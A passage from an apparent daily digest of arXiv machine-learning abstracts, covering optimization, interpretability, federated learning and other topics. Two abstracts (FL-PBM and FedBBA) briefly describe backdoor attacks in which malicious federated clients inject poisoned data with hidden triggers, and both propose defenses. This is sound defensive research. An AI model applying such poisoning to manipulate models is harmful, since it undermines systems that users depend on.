SimulCost as a static benchmark and extensible toolkit to facilitate research on improving cost-aware agentic designs for physics simulations, and for expanding new simulation environments. Code and data are available at this https URL.
机器学习
[LG-0] mporal Credit Is Free
链接: https://arxiv.org/abs/2603.28750
作者: Aur Shalev Merin
类目: Machine Learning (cs.LG)
*备注: 16 pages, 4 figures, 5 tables
Abstract:Recurrent networks do not need Jacobian propagation to adapt online. The hidden state already carries temporal credit through the forward pass; immediate derivatives suffice if you stop corrupting them with stale trace memory and normalize gradient scales across parameter groups. An architectural rule predicts when normalization is needed: \beta2 is required when gradients must pass through a nonlinear state update with no output bypass, and unnecessary otherwise. Across ten architectures, real primate neural data, and streaming ML benchmarks, immediate derivatives with RMSprop match or exceed full RTRL, scaling to n = 1024 at 1000x less memory.
[LG-1] Stop Probing Start Coding: Why Linear Probes and Sparse Autoencoders Fail at Compositional Generalisation
链接: https://arxiv.org/abs/2603.28744
作者: Vitória Barin Pacela,Shruti Joshi,Isabela Camacho,Simon Lacoste-Julien,David Klindt
类目: Machine Learning (cs.LG)
*备注:
Abstract:The linear representation hypothesis states that neural network activations encode high-level concepts as linear mixtures. However, under superposition, this encoding is a projection from a higher-dimensional concept space into a lower-dimensional activation space, and a linear decision boundary in the concept space need not remain linear after projection. In this setting, classical sparse coding methods with per-sample iterative inference leverage compressed sensing guarantees to recover latent factors. Sparse autoencoders (SAEs), on the other hand, amortise sparse inference into a fixed encoder, introducing a systematic gap. We show this amortisation gap persists across training set sizes, latent dimensions, and sparsity levels, causing SAEs to fail under out-of-distribution (OOD) compositional shifts. Through controlled experiments that decompose the failure, we identify dictionary learning – not the inference procedure – as the binding constraint: SAE-learned dictionaries point in substantially wrong directions, and replacing the encoder with per-sample FISTA on the same dictionary does not close the gap. An oracle baseline proves the problem is solvable with a good dictionary at all scales tested. Our results reframe the SAE failure as a dictionary learning challenge, not an amortisation problem, and point to scalable dictionary learning as the key open problem for sparse inference under superposition.
[LG-2] Rethinking Language Model Scaling under Transferable Hypersphere Optimization
链接: https://arxiv.org/abs/2603.28743
作者: Liliang Ren,Yang Liu,Yelong Shen,Weizhu Chen
类目: Machine Learning (cs.LG)
*备注:
Abstract:Scaling laws for large language models depend critically on the optimizer and parameterization. Existing hyperparameter transfer laws are mainly developed for first-order optimizers, and they do not structurally prevent training instability at scale. Recent hypersphere optimization methods constrain weight matrices to a fixed-norm hypersphere, offering a promising alternative for more stable scaling. We introduce HyperP (Hypersphere Parameterization), the first framework for transferring optimal learning rates across model width, depth, training tokens, and Mixture-of-Experts (MoE) granularity under the Frobenius-sphere constraint with the Muon optimizer. We prove that weight decay is a first-order no-op on the Frobenius sphere, show that Depth- \mu P remains necessary, and find that the optimal learning rate follows the same data-scaling power law with the “magic exponent” 0.32 previously observed for AdamW. A single base learning rate tuned at the smallest scale transfers across all compute budgets under HyperP, yielding 1.58\times compute efficiency over a strong Muon baseline at 6\times10^21 FLOPs. Moreover, HyperP delivers transferable stability: all monitored instability indicators, including Z -values, output RMS, and activation outliers, remain bounded and non-increasing under training FLOPs scaling. We also propose SqrtGate, an MoE gating mechanism derived from the hypersphere constraint that preserves output RMS across MoE granularities for improved granularity scaling, and show that hypersphere optimization enables substantially larger auxiliary load-balancing weights, yielding both strong performance and good expert balance. We release our training codebase at this https URL.
[LG-3] Expectation Error Bounds for Transfer Learning in Linear Regression and Linear Neural Networks
链接: https://arxiv.org/abs/2603.28739
作者: Meitong Liu,Christopher Jung,Rui Li,Xue Feng,Han Zhao
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:In transfer learning, the learner leverages auxiliary data to improve generalization on a main task. However, the precise theoretical understanding of when and how auxiliary data help remains incomplete. We provide new insights on this issue in two canonical linear settings: ordinary least squares regression and under-parameterized linear neural networks. For linear regression, we derive exact closed-form expressions for the expected generalization error with bias-variance decomposition, yielding necessary and sufficient conditions for auxiliary tasks to improve generalization on the main task. We also derive globally optimal task weights as outputs of solvable optimization programs, with consistency guarantees for empirical estimates. For linear neural networks with shared representations of width q \leq K , where K is the number of auxiliary tasks, we derive a non-asymptotic expectation bound on the generalization error, yielding the first non-vacuous sufficient condition for beneficial auxiliary learning in this setting, as well as principled directions for task weight curation. We achieve this by proving a new column-wise low-rank perturbation bound for random matrices, which improves upon existing bounds by preserving fine-grained column structures. Our results are verified on synthetic data simulated with controlled parameters.
[LG-4] See it to Place it: Evolving Macro Placements with Vision-Language Models
链接: https://arxiv.org/abs/2603.28733
作者: Ikechukwu Uchendu,Swati Goel,Karly Hou,Ebrahim Songhori,Kuang-Huei Lee,Joe Wenjie Jiang,Vijay Janapa Reddi,Vincent Zhuang
类目: Machine Learning (cs.LG)
*备注: 31 pages, 11 figures, 14 tables
Abstract:We propose using Vision-Language Models (VLMs) for macro placement in chip floorplanning, a complex optimization task that has recently shown promising advancements through machine learning methods. Because human designers rely heavily on spatial reasoning to arrange components on the chip canvas, we hypothesize that VLMs with strong visual reasoning abilities can effectively complement existing learning-based approaches. We introduce VeoPlace (Visual Evolutionary Optimization Placement), a novel framework that uses a VLM, without any fine-tuning, to guide the actions of a base placer by constraining them to subregions of the chip canvas. The VLM proposals are iteratively optimized through an evolutionary search strategy with respect to resulting placement quality. On open-source benchmarks, VeoPlace outperforms the best prior learning-based approach on 9 of 10 benchmarks with peak wirelength reductions exceeding 32%. We further demonstrate that VeoPlace generalizes to analytical placers, improving DREAMPlace performance on all 8 evaluated benchmarks with gains up to 4.3%. Our approach opens new possibilities for electronic design automation tools that leverage foundation models to solve complex physical design problems.
[LG-5] GPU-Accelerated Optimization of Transformer-Based Neural Networks for Real-Time Inference
链接: https://arxiv.org/abs/2603.28708
作者: Soutrik Mukherjee,Sangwhan Cha
类目: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
*备注: 10 pages, 8 figures, 15 tables
Abstract:This paper presents the design and evaluation of a GPU-accelerated inference pipeline for transformer models using NVIDIA TensorRT with mixed-precision optimization. We evaluate BERT-base (110M parameters) and GPT-2 (124M parameters) across batch sizes from 1 to 32 and sequence lengths from 32 to 512. The system achieves up to 64.4x speedup over CPU baselines, sub-10 ms latency for single-sample inference, and a 63 percent reduction in memory usage. We introduce a hybrid precision strategy that preserves FP32 for numerically sensitive operations such as softmax and layer normalization, while applying FP16 to linear layers. This approach maintains high numerical fidelity (cosine similarity = 0.9998 relative to baseline outputs) and eliminates NaN instability. The pipeline is implemented as a modular, containerized system that enables reproducible benchmarking across more than 360 configurations. Cross-GPU validation on an NVIDIA A100 shows consistent FP16 speedup ratios between 1.84x and 2.00x, along with stable numerical behavior. Downstream evaluation on SST-2 demonstrates no accuracy degradation under hybrid precision. Validation on WikiText-2 shows that random inputs underestimate NaN instability by up to 6x for full FP16, while confirming the robustness of the hybrid approach (0.0 percent NaN, cosine similarity = 0.9998). These results provide a detailed characterization of performance and accuracy trade-offs across GPU architectures and offer practical guidance for deploying transformer models in latency-critical environments.
[LG-6] Subspace Optimization for Backpropagation-Free Continual Test-Time Adaptation
链接: https://arxiv.org/abs/2603.28678
作者: Damian Sójka,Sebastian Cygert,Marc Masana
类目: Machine Learning (cs.LG)
*备注:
Abstract:We introduce PACE, a backpropagation-free continual test-time adaptation system that directly optimizes the affine parameters of normalization layers. Existing derivative-free approaches struggle to balance runtime efficiency with learning capacity, as they either restrict updates to input prompts or require continuous, resource-intensive adaptation regardless of domain stability. To address these limitations, PACE leverages the Covariance Matrix Adaptation Evolution Strategy with the Fastfood projection to optimize high-dimensional affine parameters within a low-dimensional subspace, leading to superior adaptive performance. Furthermore, we enhance the runtime efficiency by incorporating an adaptation stopping criterion and a domain-specialized vector bank to eliminate redundant computation. Our framework achieves state-of-the-art accuracy across multiple benchmarks under continual distribution shifts, reducing runtime by over 50% compared to existing backpropagation-free methods.
[LG-7] FL-PBM: Pre-Training Backdoor Mitigation for Federated Learning
链接: https://arxiv.org/abs/2603.28673
作者: Osama Wehbi,Sarhad Arisdakessian,Omar Abdel Wahab,Azzam Mourad,Hadi Otrok,Jamal Bentahar
类目: Machine Learning (cs.LG); Cryptography and Security (cs.CR); Distributed, Parallel, and Cluster Computing (cs.DC)
*备注: 12 pages, 3 figures, 1 table, 2 algorithms, Regular Journal Paper
Abstract:Backdoor attacks pose a significant threat to the integrity and reliability of Artificial Intelligence (AI) models, enabling adversaries to manipulate model behavior by injecting poisoned data with hidden triggers. These attacks can lead to severe consequences, especially in critical applications such as autonomous driving, healthcare, and finance. Detecting and mitigating backdoor attacks is crucial across the lifespan of model’s phases, including pre-training, in-training, and post-training. In this paper, we propose Pre-Training Backdoor Mitigation for Federated Learning (FL-PBM), a novel defense mechanism that proactively filters poisoned data on the client side before model training in a federated learning (FL) environment. The approach consists of three stages: (1) inserting a benign trigger into the data to establish a controlled baseline, (2) applying Principal Component Analysis (PCA) to extract discriminative features and assess the separability of the data, (3) performing Gaussian Mixture Model (GMM) clustering to identify potentially malicious data samples based on their distribution in the PCA-transformed space, and (4) applying a targeted blurring technique to disrupt potential backdoor triggers. Together, these steps ensure that suspicious data is detected early and sanitized effectively, thereby minimizing the influence of backdoor triggers on the global model. Experimental evaluations on image-based datasets demonstrate that FL-PBM reduces attack success rates by up to 95% compared to baseline federated learning (FedAvg) and by 30 to 80% relative to state-of-the-art defenses (RDFL and LPSF). At the same time, it maintains over 90% clean model accuracy in most experiments, achieving better mitigation without degrading model performance.
[LG-8] Mitigating Backdoor Attacks in Federated Learning Using PPA and MiniMax Game Theory
链接: https://arxiv.org/abs/2603.28652
作者: Osama Wehbi,Sarhad Arisdakessian,Omar Abdel Wahab,Anderson Avila,Azzam Mourad,Hadi Otrok
类目: Machine Learning (cs.LG); Cryptography and Security (cs.CR); Distributed, Parallel, and Cluster Computing (cs.DC); Computer Science and Game Theory (cs.GT)
*备注: 12 pages, 4 images, 2 tables, 2 algorithms, Regular Journal Paper
Abstract:Federated Learning (FL) is witnessing wider adoption due to its ability to benefit from large amounts of scattered data while preserving privacy. However, despite its advantages, federated learning suffers from several setbacks that directly impact the accuracy, and the integrity of the global model it produces. One of these setbacks is the presence of malicious clients who actively try to harm the global model by injecting backdoor data into their local models while trying to evade detection. The objective of such clients is to trick the global model into making false predictions during inference, thereby compromising the integrity and trustworthiness of the global model on which honest stakeholders rely. To mitigate such mischievous behavior, we propose FedBBA (Federated Backdoor and Behavior Analysis). The proposed model aims to dampen the effect of such clients on the final accuracy, creating more resilient federated learning environments. We engineer our approach through the combination of (1) a reputation system to evaluate and track client behavior, (2) an incentive mechanism to reward honest participation and penalize malicious behavior, and (3) game theoretical models with projection pursuit analysis (PPA) to dynamically identify and minimize the impact of malicious clients on the global model. Extensive simulations on the German Traffic Sign Recognition Benchmark (GTSRB) and Belgium Traffic Sign Classification (BTSC) datasets demonstrate that FedBBA reduces the backdoor attack success rate to approximately 1.1%–11% across various attack scenarios, significantly outperforming state-of-the-art defenses like RDFL and RoPE, which yielded attack success rates between 23% and 76%, while maintaining high normal task accuracy (~95%–98%).
[LG-9] Constructing Composite Features for Interpretable Music-Tagging ICASSP2026
链接: https://arxiv.org/abs/2603.28644
作者: Chenhao Xue,Weitao Hu,Joyraj Chakraborty,Zhijin Guo,Kang Li,Tianyu Shi,Martin Reed,Nikolaos Thomos
类目: ound (cs.SD); Machine Learning (cs.LG); Multimedia (cs.MM)
*备注: 5 pages, 8 figures, accepted at ICASSP 2026
Abstract:Combining multiple audio features can improve the performance of music tagging, but common deep learning-based feature fusion methods often lack interpretability. To address this problem, we propose a Genetic Programming (GP) pipeline that automatically evolves composite features by mathematically combining base music features, thereby capturing synergistic interactions while preserving interpretability. This approach provides representational benefits similar to deep feature fusion without sacrificing interpretability. Experiments on the MTG-Jamendo and GTZAN datasets demonstrate consistent improvements compared to state-of-the-art systems across base feature sets at different abstraction levels. It should be noted that most of the performance gains are noticed within the first few hundred GP evaluations, indicating that effective feature combinations can be identified under modest search budgets. The top evolved expressions include linear, nonlinear, and conditional forms, with various low-complexity solutions at top performance aligned with parsimony pressure to prefer simpler expressions. Analyzing these composite features further reveals which interactions and transformations tend to be beneficial for tagging, offering insights that remain opaque in black-box deep models.
[LG-10] LACE: Loss-Adaptive Capacity Expansion for Continual Learning
链接: https://arxiv.org/abs/2603.28611
作者: Shivnath Tathe
类目: Machine Learning (cs.LG)
*备注:
Abstract:Fixed representational capacity is a fundamental constraint in continual learning: practitioners must guess an appropriate model width before training, without knowing how many distinct concepts the data contains. We propose LACE (Loss-Adaptive Capacity Expansion), a simple online mechanism that expands a model’s representational capacity during training by monitoring its own loss signal. When sustained loss deviation exceeds a threshold - indicating that the current capacity is insufficient for newly encountered data - LACE adds new dimensions to the projection layer and trains them jointly with existing parameters. Across synthetic and real-data experiments, LACE triggers expansions exclusively at domain boundaries (100% boundary precision, zero false positives), matches the accuracy of a large fixed-capacity model while starting from a fraction of its dimensions, and produces adapter dimensions that are collectively critical to performance (3% accuracy drop when all adapters removed). We further demonstrate unsupervised domain separation in GPT-2 activations via layer-wise clustering, showing a U-shaped separability curve across layers that motivates adaptive capacity allocation in deep networks. LACE requires no labels, no replay buffers, and no external controllers, making it suitable for on-device continual learning under resource constraints.
[LG-11] Position: Explainable AI is Causality in Disguise
链接: https://arxiv.org/abs/2603.28597
作者: Amir-Hossein Karimi
类目: Machine Learning (cs.LG)
*备注:
Abstract:The demand for Explainable AI (XAI) has triggered an explosion of methods, producing a landscape so fragmented that we now rely on surveys of surveys. Yet, fundamental challenges persist: conflicting metrics, failed sanity checks, and unresolved debates over robustness and fairness. The only consensus on how to achieve explainability is a lack of one. This has led many to point to the absence of a ground truth for defining ``the’’ correct explanation as the main culprit. This position paper posits that the persistent discord in XAI arises not from an absent ground truth but from a ground truth that exists, albeit as an elusive and challenging target: the causal model that governs the relevant system. By reframing XAI queries about data, models, or decisions as causal inquiries, we prove the necessity and sufficiency of causal models for XAI. We contend that without this causal grounding, XAI remains unmoored. Ultimately, we encourage the community to converge around advanced concept and causal discovery to escape this entrenched uncertainty. Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.28597 [cs.LG] (or arXiv:2603.28597v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28597 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-12] Optimistic Actor-Critic with Parametric Policies for Linear Markov Decision Processes
链接: https://arxiv.org/abs/2603.28595
作者: Max Qiushi Lin,Reza Asad,Kevin Tan,Haque Ishfaq,Csaba Szepesvari,Sharan Vaswani
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Although actor-critic methods have been successful in practice, their theoretical analyses have several limitations. Specifically, existing theoretical work either sidesteps the exploration problem by making strong assumptions or analyzes impractical methods with complicated algorithmic modifications. Moreover, the actor-critic methods analyzed for linear MDPs often employ natural policy gradient (NPG) and construct “implicit” policies without explicit parameterization. Such policies are computationally expensive to sample from, making the environment interactions inefficient. To that end, we focus on the finite-horizon linear MDPs and propose an optimistic actor-critic framework that uses parametric log-linear policies. In particular, we introduce a tractable \textitlogit-matching regression objective for the actor. For the critic, we use approximate Thompson sampling via Langevin Monte Carlo to obtain optimistic value estimates. We prove that the resulting algorithm achieves \widetilde\mathcalO(\epsilon^-4) and \widetilde\mathcalO(\epsilon^-2) sample complexity in the on-policy and off-policy setting, respectively. Our results match prior theoretical works in achieving the state-of-the-art sample complexity, while our algorithm is more aligned with practice.
[LG-13] Physics-Informed Framework for Impact Identification in Aerospace Composites
链接: https://arxiv.org/abs/2603.28593
作者: Natália Ribeiro Marinho,Richard Loendersloot,Jan Willem Wiegman,Frank Grooteman,Tiedo Tinga
类目: Machine Learning (cs.LG); Applied Physics (physics.app-ph)
*备注:
Abstract:This paper introduces a novel physics-informed impact identification (Phy-ID) framework. The proposed method integrates observational, inductive, and learning biases to combine physical knowledge with data-driven inference in a unified modelling strategy, achieving physically consistent and numerically stable impact identification. The physics-informed approach structures the input space using physics-based energy indicators, constrains admissible solutions via architectural design, and enforces governing relations via hybrid loss formulations. Together, these mechanisms limit non-physical solutions and stabilise inference under degraded measurement conditions. A disjoint inference formulation is used as a representative use case to demonstrate the framework capabilities, in which impact velocity and impactor mass are inferred through decoupled surrogate models, and impact energy is computed by enforcing kinetic energy consistency. Experimental evaluations show mean absolute percentage errors below 8% for inferred impact velocity and impactor mass and below 10% for impact energy. Additional analyses confirm stable performance under reduced data availability and increased measurement noise, as well as generalisation for out-of-distribution cases across pristine and damaged regimes when damaged responses are included in training. These results indicate that the systematic integration of physics-informed biases enables reliable, physically consistent, and data-efficient impact identification, highlighting the potential of the approach for practical monitoring systems.
[LG-14] Unrestrained Simplex Denoising for Discrete Data. A Non-Markovian Approach Applied to Graph Generation
链接: https://arxiv.org/abs/2603.28572
作者: Yoann Boget,Alexandros Kalousis
类目: Machine Learning (cs.LG)
*备注: Simplex Denoising
Abstract:Denoising models such as Diffusion or Flow Matching have recently advanced generative modeling for discrete structures, yet most approaches either operate directly in the discrete state space, causing abrupt state changes. We introduce simplex denoising, a simple yet effective generative framework that operates on the probability simplex. The key idea is a non-Markovian noising scheme in which, for a given clean data point, noisy representations at different times are conditionally independent. While preserving the theoretical guarantees of denoising-based generative models, our method removes unnecessary constraints, thereby improving performance and simplifying the formulation. Empirically, \emphunrestrained simplex denoising surpasses strong discrete diffusion and flow-matching baselines across synthetic and real-world graph benchmarks. These results highlight the probability simplex as an effective framework for discrete generative modeling.
[LG-15] Mixture-Model Preference Learning for Many-Objective Bayesian Optimization
链接: https://arxiv.org/abs/2603.28410
作者: Manisha Dubey,Sebastiaan De Peuter,Wanrong Wang,Samuel Kaski
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 18 pages, 9 figures
Abstract:Preference-based many-objective optimization faces two obstacles: an expanding space of trade-offs and heterogeneous, context-dependent human value structures. Towards this, we propose a Bayesian framework that learns a small set of latent preference archetypes rather than assuming a single fixed utility function, modelling them as components of a Dirichlet-process mixture with uncertainty over both archetypes and their weights. To query efficiently, we designing hybrid queries that target information about (i) mode identity and (ii) within-mode trade-offs. Under mild assumptions, we provide a simple regret guarantee for the resulting mixture-aware Bayesian optimization procedure. Empirically, our method outperforms standard baselines on synthetic and real-world many-objective benchmarks, and mixture-aware diagnostics reveal structure that regret alone fails to capture.
[LG-16] Label-efficient Training Updates for Malware Detection over Time
链接: https://arxiv.org/abs/2603.28396
作者: Luca Minnei,Cristian Manca,Giorgio Piras,Angelo Sotgiu,Maura Pintor,Daniele Ghiani,Davide Maiorca,Giorgio Giacinto,Battista Biggio
类目: Machine Learning (cs.LG); Cryptography and Security (cs.CR)
*备注: Submitted to IEEE Transactions on Information Forensics and Security
Abstract:Machine Learning (ML)-based detectors are becoming essential to counter the proliferation of malware. However, common ML algorithms are not designed to cope with the dynamic nature of real-world settings, where both legitimate and malicious software evolve. This distribution drift causes models trained under static assumptions to degrade over time unless they are continuously updated. Regularly retraining these models, however, is expensive, since labeling new acquired data requires costly manual analysis by security experts. To reduce labeling costs and address distribution drift in malware detection, prior work explored active learning (AL) and semi-supervised learning (SSL) techniques. Yet, existing studies (i) are tightly coupled to specific detector architectures and restricted to a specific malware domain, resulting in non-uniform comparisons; and (ii) lack a consistent methodology for analyzing the distribution drift, despite the critical sensitivity of the malware domain to temporal changes. In this work, we bridge this gap by proposing a model-agnostic framework that evaluates an extensive set of AL and SSL techniques, isolated and combined, for Android and Windows malware detection. We show that these techniques, when combined, can reduce manual annotation costs by up to 90% across both domains while achieving comparable detection performance to full-labeling retraining. We also introduce a methodology for feature-level drift analysis that measures feature stability over time, showing its correlation with the detector performance. Overall, our study provides a detailed understanding of how AL and SSL behave under distribution drift and how they can be successfully combined, offering practical insights for the design of effective detectors over time.
[LG-17] Machine Learning-Assisted High-Dimensional Matrix Estimation
链接: https://arxiv.org/abs/2603.28346
作者: Wan Tian,Hui Yang,Zhouhui Lian,Lingyue Zhang,Yijie Peng
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Efficient estimation of high-dimensional matrices-including covariance and precision matrices-is a cornerstone of modern multivariate statistics. Most existing studies have focused primarily on the theoretical properties of the estimators (e.g., consistency and sparsity), while largely overlooking the computational challenges inherent in high-dimensional settings. Motivated by recent advances in learning-based optimization method-which integrate data-driven structures with classical optimization algorithms-we explore high-dimensional matrix estimation assisted by machine learning. Specifically, for the optimization problem of high-dimensional matrix estimation, we first present a solution procedure based on the Linearized Alternating Direction Method of Multipliers (LADMM). We then introduce learnable parameters and model the proximal operators in the iterative scheme with neural networks, thereby improving estimation accuracy and accelerating convergence. Theoretically, we first prove the convergence of LADMM, and then establish the convergence, convergence rate, and monotonicity of its reparameterized counterpart; importantly, we show that the reparameterized LADMM enjoys a faster convergence rate. Notably, the proposed reparameterization theory and methodology are applicable to the estimation of both high-dimensional covariance and precision matrices. We validate the effectiveness of our method by comparing it with several classical optimization algorithms across different structures and dimensions of high-dimensional matrices.
[LG-18] Key-Embedded Privacy for Decentralized AI in Biomedical Omics
链接: https://arxiv.org/abs/2603.28334
作者: Rongyu Zhang,Hongyu Dong,Gaole Dai,Ziqi Qiao,Shenli Zheng,Yuan Zhang,Aosong Cheng,Xiaowei Chi,Jincai Luo,Pin Li,Li Du,Dan Wang,Yuan Du,Xudong Xing,Jianxu Chen,Shanghang Zhang
类目: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
*备注:
Abstract:The rapid adoption of data-driven methods in biomedicine has intensified concerns over privacy, governance, and regulation, limiting raw data sharing and hindering the assembly of representative cohorts for clinically relevant AI. This landscape necessitates practical, efficient privacy solutions, as cryptographic defenses often impose heavy overhead and differential privacy can degrade performance, leading to sub-optimal outcomes in real-world settings. Here, we present a lightweight federated learning method, INFL, based on Implicit Neural Representations that addresses these challenges. Our approach integrates plug-and-play, coordinate-conditioned modules into client models, embeds a secret key directly into the architecture, and supports seamless aggregation across heterogeneous sites. Across diverse biomedical omics tasks, including cohort-scale classification in bulk proteomics, regression for perturbation prediction in single-cell transcriptomics, and clustering in spatial transcriptomics and multi-omics with both public and private data, we demonstrate that INFL achieves strong, controllable privacy while maintaining utility, preserving the performance necessary for downstream scientific and clinical applications.
[LG-19] Physics-Informed Neural Networks for Predicting Hydrogen Sorption in Geological Formations: Thermodynamically Constrained Deep Learning Integrating Classical Adsorption Theory
链接: https://arxiv.org/abs/2603.28328
作者: Mohammad Nooraiepour,Mohammad Masoudi,Zezhang Song,Helge Hellevang
类目: Machine Learning (cs.LG); Geophysics (physics.geo-ph)
*备注:
Abstract:Accurate prediction of hydrogen sorption in fine-grained geological materials is essential for evaluating underground hydrogen storage capacity, assessing caprock integrity, and characterizing hydrogen migration in subsurface energy systems. Classical isotherm models perform well at the individual-sample level but fail when generalized across heterogeneous populations, with the coefficient of determination collapsing from 0.80-0.90 for single-sample fits to 0.09-0.38 for aggregated multi-sample datasets. We present a multi-scale physics-informed neural network framework that addresses this limitation by embedding classical adsorption theory and thermodynamic constraints directly into the learning process. The framework utilizes 1,987 hydrogen sorption isotherm measurements across clays, shales, coals, supplemented by 224 characteristic uptake measurements. A seven-category physics-informed feature engineering scheme generates 62 thermodynamically meaningful descriptors from raw material characterization data. The loss function enforces saturation limits, a monotonic pressure response, and Van’t Hoff temperature dependence via penalty weighting, while a three-phase curriculum-based training strategy ensures stable integration of competing physical constraints. An architecture-diverse ensemble of ten members provides calibrated uncertainty quantification, with post-hoc temperature scaling achieving target prediction interval coverage. The optimized PINN achieves R2 = 0.9544, RMSE = 0.0484 mmol/g, and MAE = 0.0231 mmol/g on the held-out test set, with 98.6% monotonicity satisfaction and zero non-physical negative predictions. Physics-informed regularization yields a 10-15% cross-lithology generalization advantage over a well-tuned random forest under leave-one-lithology-out validation, confirming that thermodynamic constraints transfer meaningfully across geological boundaries.
[LG-20] FairGC: Fairness-aware Graph Condensation IJCNN2026
链接: https://arxiv.org/abs/2603.28321
作者: Yihan Gao,Chenxi Huang,Wen Shi,Ke Sun,Ziqi Xu,Xikun Zhang,Mingliang Hou,Renqiang Luo
类目: Machine Learning (cs.LG)
*备注: 6 pages, IJCNN 2026 accepted
Abstract:Graph condensation (GC) has become a vital strategy for scaling Graph Neural Networks by compressing massive datasets into small, synthetic node sets. While current GC methods effectively maintain predictive accuracy, they are primarily designed for utility and often ignore fairness constraints. Because these techniques are bias-blind, they frequently capture and even amplify demographic disparities found in the original data. This leads to synthetic proxies that are unsuitable for sensitive applications like credit scoring or social recommendations. To solve this problem, we introduce FairGC, a unified framework that embeds fairness directly into the graph distillation process. Our approach consists of three key components. First, a Distribution-Preserving Condensation module synchronizes the joint distributions of labels and sensitive attributes to stop bias from spreading. Second, a Spectral Encoding module uses Laplacian eigen-decomposition to preserve essential global structural patterns. Finally, a Fairness-Enhanced Neural Architecture employs multi-domain fusion and a label-smoothing curriculum to produce equitable predictions. Rigorous evaluations on four real-world datasets, show that FairGC provides a superior balance between accuracy and fairness. Our results confirm that FairGC significantly reduces disparity in Statistical Parity and Equal Opportunity compared to existing state-of-the-art condensation models. The codes are available at this https URL.
[LG-21] aming the Instability: A Robust Second-Order Optimizer for Federated Learning over Non-IID Data
链接: https://arxiv.org/abs/2603.28316
作者: Yuanqiao Zhang,Tiantian He,Yuan Gao,Yixin Wang,Yew-Soon Ong,Maoguo Gong,A.K. Qin,Hui Li
类目: Machine Learning (cs.LG)
*备注: 33 pages, preprint, under review
Abstract:In this paper, we present Federated Robust Curvature Optimization (FedRCO), a novel second-order optimization framework designed to improve convergence speed and reduce communication cost in Federated Learning systems under statistical heterogeneity. Existing second-order optimization methods are often computationally expensive and numerically unstable in distributed settings. In contrast, FedRCO addresses these challenges by integrating an efficient approximate curvature optimizer with a provable stability mechanism. Specifically, FedRCO incorporates three key components: (1) a Gradient Anomaly Monitor that detects and mitigates exploding gradients in real-time, (2) a Fail-Safe Resilience protocol that resets optimization states upon numerical instability, and (3) a Curvature-Preserving Adaptive Aggregation strategy that safely integrates global knowledge without erasing the local curvature geometry. Theoretical analysis shows that FedRCO can effectively mitigate instability and prevent unbounded updates while preserving optimization efficiency. Extensive experiments show that FedRCO achieves superior robustness against diverse non-IID scenarios while achieving higher accuracy and faster convergence than both state-of-the-art first-order and second-order methods.
[LG-22] LIBERO-Para: A Diagnostic Benchmark and Metrics for Paraphrase Robustness in VLA Models
链接: https://arxiv.org/abs/2603.28301
作者: Chanyoung Kim,Minwoo Kim,Minseok Kang,Hyunwoo Kim,Dahuin Jung
类目: Machine Learning (cs.LG)
*备注: 32 pages, 28 figures
Abstract:Vision-Language-Action (VLA) models achieve strong performance in robotic manipulation by leveraging pre-trained vision-language backbones. However, in downstream robotic settings, they are typically fine-tuned with limited data, leading to overfitting to specific instruction formulations and leaving robustness to paraphrased instructions underexplored. To study this gap, we introduce LIBERO-Para, a controlled benchmark that independently varies action expressions and object references for fine-grained analysis of linguistic generalization. Across seven VLA configurations (0.6B-7.5B), we observe consistent performance degradation of 22-52 pp under paraphrasing. This degradation is primarily driven by object-level lexical variation: even simple synonym substitutions cause large drops, indicating reliance on surface-level matching rather than semantic grounding. Moreover, 80-96% of failures arise from planning-level trajectory divergence rather than execution errors, showing that paraphrasing disrupts task identification. Binary success rate treats all paraphrases equally, obscuring whether models perform consistently across difficulty levels or rely on easier cases. To address this, we propose PRIDE, a metric that quantifies paraphrase difficulty using semantic and syntactic factors. Our benchmark and corresponding code are available at: this https URL
[LG-23] OptINC: Optical In-Network-Computing for Scalable Distributed Learning
链接: https://arxiv.org/abs/2603.28290
作者: Sijie Fei,Grace Li Zhang,Bing Li,Ulf Schlichtmann
类目: Machine Learning (cs.LG); Hardware Architecture (cs.AR)
*备注:
Abstract:Distributed learning is widely used for training large models on large datasets by distributing parts of the model or dataset across multiple devices and aggregating the computed results for subsequent computations or parameter updates. Existing communication algorithms for distributed learning such as ring all-reduce result in heavy communication overhead between servers. Since communication in large-scale systems uses optical fibers, we propose an Optical In-Network-Computing (OptINC) architecture to offload the computation in servers onto the optical interconnects. To execute gradient averaging and quantization in the optical domain, we incorporate optical devices such as Mach-Zehnder-Interferometers (MZIs) into the interconnects. Such a de facto optical neural network (ONN) can effectively reduce the communication overhead in existing distributed training solutions. To reduce dataset complexity for training this neural network, a preprocessing algorithm implemented in the optical domain is also proposed. Hardware cost is lowered by approximating the weight matrices of the optical neural network with unitary and diagonal matrices, while the accuracy is maintained by a proposed hardware-aware training algorithm. The proposed solution was evaluated on real distributed learning tasks, including ResNet50 on CIFAR-100, and a LLaMA-based network on Wikipedia-1B. In both cases, the proposed framework can achieve comparable training accuracy to the ring all-reduce baseline, while eliminating communication overhead.
[LG-24] Corruption-robust Offline Multi-agent Reinforcement Learning From Human Feedback
链接: https://arxiv.org/abs/2603.28281
作者: Andi Nika,Debmalya Mandal,Parameswaran Kamalaruban,Adish Singla,Goran Radanović
类目: Machine Learning (cs.LG)
*备注:
Abstract:We consider robustness against data corruption in offline multi-agent reinforcement learning from human feedback (MARLHF) under a strong-contamination model: given a dataset D of trajectory-preference tuples (each preference being an n -dimensional binary label vector representing each of the n agents’ preferences), an \epsilon -fraction of the samples may be arbitrarily corrupted. We model the problem using the framework of linear Markov games. First, under a uniform coverage assumption - where every policy of interest is sufficiently represented in the clean (prior to corruption) data - we introduce a robust estimator that guarantees an O(\epsilon^1 - o(1)) bound on the Nash equilibrium gap. Next, we move to the more challenging unilateral coverage setting, in which only a Nash equilibrium and its single-player deviations are covered. In this case, our proposed algorithm achieves an O(\sqrt\epsilon) bound on the Nash gap. Both of these procedures, however, suffer from intractable computation. To address this, we relax our solution concept to coarse correlated equilibria (CCE). Under the same unilateral coverage regime, we derive a quasi-polynomial-time algorithm whose CCE gap scales as O(\sqrt\epsilon) . To the best of our knowledge, this is the first systematic treatment of 